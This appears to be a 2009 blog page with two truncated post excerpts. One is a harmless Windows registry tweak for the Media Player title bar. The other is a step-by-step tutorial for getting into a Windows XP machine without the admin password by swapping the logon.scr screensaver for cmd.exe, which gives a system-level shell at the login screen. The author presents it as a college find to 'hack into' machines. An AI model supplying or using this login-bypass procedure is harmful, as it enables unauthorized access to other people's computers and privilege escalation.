Posted by Vikash Dhankar on September 6, 2009 ·
I am going to give you some Registry Edit Hack, that you can apply in your windows machine to modify it:
1. Customize Windows Media Player Title Bar:-
[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Software\Policies\Microsoft
Create the Key [WindowsMediaPlayer].
Modify/Create the Value Name [TitleBar] according to the Value Data listed below.
Data Type: REG_SZ [String Value] // Value Name: TitleBar
Value Data: [Enter the text to be displayed [...]
Posted by Vikash Dhankar on September 6, 2009 ·
This tutorial is all about, that how we can enter into the Windows Machine(XP), without having the ADMIN Password.
I found this in my college and thought to share with you readers.
There are simple steps follow them and hack into.
1. Run the cmd.exe( Start-run-cmd press enter)
2. cd\
3. cd\windows\system32
4. mkdir temphack
5. copy logon.scr temphack\logon.scr
5. copy cmd.exe temphack\cmd.exe
6. del logon.scr
7. rename cmd.exe logon.scr
8. exit
Thats [...]